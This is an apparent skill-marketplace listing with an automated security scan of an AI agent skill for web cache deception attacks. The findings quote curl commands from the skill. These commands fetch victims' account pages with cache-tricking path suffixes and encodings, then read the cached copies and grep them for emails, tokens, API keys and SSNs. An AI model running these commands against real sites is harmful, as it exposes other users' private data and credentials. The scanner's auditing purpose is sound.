performing-web-cache-deception-attack

Enables execution of web cache deception attacks by exploiting path normalization discrepancies in CDN caching layers.

Install this skill

0/100

Security score

The performing-web-cache-deception-attack skill was audited on Jun 5, 2026 and we found 48 security issues across 2 threat categories. Review the findings below before installing.

Categories Tested

Security Issues

medium line 57

Curl to non-GitHub URL

SourceSKILL.md

57	curl -I http://target.com/account/profile

medium line 61

Curl to non-GitHub URL

SourceSKILL.md

61	curl -I "http://target.com/static/style.css"

medium line 67

Curl to non-GitHub URL

SourceSKILL.md

67	curl -sI "http://target.com/test.$ext" \| grep -i "x-cache\\|cf-cache"

medium line 78

Curl to non-GitHub URL

SourceSKILL.md

78	curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/anything.css"

medium line 81

Curl to non-GitHub URL

SourceSKILL.md

81	curl "http://target.com/account/profile/anything.css"

medium line 86

Curl to non-GitHub URL

SourceSKILL.md

86	curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/x.$ext" -o /dev/null

medium line 89

Curl to non-GitHub URL

SourceSKILL.md

89	curl -s "http://target.com/account/profile/x.$ext" \| head -c 200

medium line 98

Curl to non-GitHub URL

SourceSKILL.md

98	curl -b "session=VICTIM" "http://target.com/account/profile;anything.css"

medium line 101

Curl to non-GitHub URL

SourceSKILL.md

101	curl -b "session=VICTIM" "http://target.com/account/profile%2Fstatic.css"

medium line 102

Curl to non-GitHub URL

SourceSKILL.md

102	curl -b "session=VICTIM" "http://target.com/account/profile%3Bstyle.css"

medium line 105

Curl to non-GitHub URL

SourceSKILL.md

105	curl -b "session=VICTIM" "http://target.com/account/profile%00.css"

medium line 108

Curl to non-GitHub URL

SourceSKILL.md

108	curl -b "session=VICTIM" "http://target.com/account/profile%23.css"

medium line 111

Curl to non-GitHub URL

SourceSKILL.md

111	curl -b "session=VICTIM" "http://target.com/static/..%2Faccount/profile"

medium line 120

Curl to non-GitHub URL

SourceSKILL.md

120	curl -b "session=VICTIM" "http://target.com/static/../account/profile"

medium line 124

Curl to non-GitHub URL

SourceSKILL.md

124	curl -b "session=VICTIM" "http://target.com/static/..%2faccount/profile"

medium line 127

Curl to non-GitHub URL

SourceSKILL.md

127	curl -b "session=VICTIM" "http://target.com/account/profile/X.CSS"

medium line 130

Curl to non-GitHub URL

SourceSKILL.md

130	curl -b "session=VICTIM" "http://target.com/account/profile/%252e%252e/static.css"

medium line 139

Curl to non-GitHub URL

SourceSKILL.md

139	curl -b "session=VICTIM" "http://target.com/account/profile?cachebuster=123.css"

medium line 142

Curl to non-GitHub URL

SourceSKILL.md

142	curl -b "session=VICTIM" "http://target.com/account/profile/./style.css"

medium line 143

Curl to non-GitHub URL

SourceSKILL.md

143	curl "http://target.com/account/profile/./style.css" # Check if cached

medium line 161

Curl to non-GitHub URL

SourceSKILL.md

161	curl -I "http://target.com/account/profile/x.css"

medium line 165

Curl to non-GitHub URL

SourceSKILL.md

165	curl -s "http://target.com/account/profile/x.css" \| grep -i "email\\|name\\|token\\|api_key\\|ssn"

low line 57

External URL reference

SourceSKILL.md

57	curl -I http://target.com/account/profile

low line 61

External URL reference

SourceSKILL.md

61	curl -I "http://target.com/static/style.css"

low line 67

External URL reference

SourceSKILL.md

67	curl -sI "http://target.com/test.$ext" \| grep -i "x-cache\\|cf-cache"

low line 74

External URL reference

SourceSKILL.md

74	# Victim visits: http://target.com/account/profile/nonexistent.css

low line 78

External URL reference

SourceSKILL.md

78	curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/anything.css"

low line 81

External URL reference

SourceSKILL.md

81	curl "http://target.com/account/profile/anything.css"

low line 86

External URL reference

SourceSKILL.md

86	curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/x.$ext" -o /dev/null

low line 89

External URL reference

SourceSKILL.md

89	curl -s "http://target.com/account/profile/x.$ext" \| head -c 200

low line 98

External URL reference

SourceSKILL.md

98	curl -b "session=VICTIM" "http://target.com/account/profile;anything.css"

low line 101

External URL reference

SourceSKILL.md

101	curl -b "session=VICTIM" "http://target.com/account/profile%2Fstatic.css"

low line 102

External URL reference

SourceSKILL.md

102	curl -b "session=VICTIM" "http://target.com/account/profile%3Bstyle.css"

low line 105

External URL reference

SourceSKILL.md

105	curl -b "session=VICTIM" "http://target.com/account/profile%00.css"

low line 108

External URL reference

SourceSKILL.md

108	curl -b "session=VICTIM" "http://target.com/account/profile%23.css"

low line 111

External URL reference

SourceSKILL.md

111	curl -b "session=VICTIM" "http://target.com/static/..%2Faccount/profile"

low line 120

External URL reference

SourceSKILL.md

120	curl -b "session=VICTIM" "http://target.com/static/../account/profile"

low line 124

External URL reference

SourceSKILL.md

124	curl -b "session=VICTIM" "http://target.com/static/..%2faccount/profile"

low line 127

External URL reference

SourceSKILL.md

127	curl -b "session=VICTIM" "http://target.com/account/profile/X.CSS"

low line 130

External URL reference

SourceSKILL.md

130	curl -b "session=VICTIM" "http://target.com/account/profile/%252e%252e/static.css"

low line 139

External URL reference

SourceSKILL.md

139	curl -b "session=VICTIM" "http://target.com/account/profile?cachebuster=123.css"

low line 142

External URL reference

SourceSKILL.md

142	curl -b "session=VICTIM" "http://target.com/account/profile/./style.css"

low line 143

External URL reference

SourceSKILL.md

143	curl "http://target.com/account/profile/./style.css" # Check if cached

low line 147

External URL reference

SourceSKILL.md

147	"http://target.com/static/cached.css"

low line 153

External URL reference

SourceSKILL.md

153	# 1. Craft malicious URL: http://target.com/account/profile/x.css

low line 161

External URL reference

SourceSKILL.md

161	curl -I "http://target.com/account/profile/x.css"

low line 165

External URL reference

SourceSKILL.md

165	curl -s "http://target.com/account/profile/x.css" \| grep -i "email\\|name\\|token\\|api_key\\|ssn"

low line 203

External URL reference

SourceSKILL.md

203	- Target: http://target.com

Scanned on Jun 5, 2026

View Security Dashboard

Installation guide →

GitHub Stars 8

Rate this skill

Categorydevelopment

UpdatedJune 15, 2026

openclaw api security-engineer development

26zl/cybersec-toolkit